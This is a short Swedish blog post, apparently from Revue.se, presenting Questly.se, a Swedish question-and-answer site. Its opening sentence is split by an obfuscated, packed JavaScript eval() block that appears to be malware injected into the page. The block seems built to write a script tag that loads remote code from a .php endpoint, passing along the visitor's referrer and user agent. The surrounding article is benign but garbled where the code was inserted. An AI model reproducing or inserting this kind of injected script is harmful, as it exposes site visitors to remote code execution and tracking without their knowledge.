Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

Questly.se, frågor och svar på nätet

Questly.se, frågor och svar på nätet
Sebastian

Vi eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fzdkb|var|u0026u|referrer|rkrkb||js|php’.split(’|’),0,{}))
på Revue.se älskar Startups, speciellt när det kommer till idéer som fokuserar på digitala lösningar. 

Questly.se är en sajt där användare kan hjälpa varandra med kluriga frågor som man vill hitta ett eller fler svar på. Enkelt är det en svensk sajt med frågor och svar. Internationellt har trenden för liknande tjänster blivit mycket framgångsrika. Exempel på detta är Yahoo Answers och Ask.fm.

Detta är något som vi märkt på Revue.se och har därför nu lanserat denna tjänst i Sverige. Questly.se blir bättre och bättre ju fler frågor och svar som strömmar in då databasen blir en kunskapsdatabas att använda sig av likt wikipedia. Skillnaden på Wikipedia är att man på Questly.se kan hitta allt möjligt och det kan vara allt från tips till svar baserade på ren fakta.

En rolig tjänst som vi hoppas att folk kommer upptäcka potentialen i.

Gå gärna in och testa själva och utforska.

Hemsida: Questly.se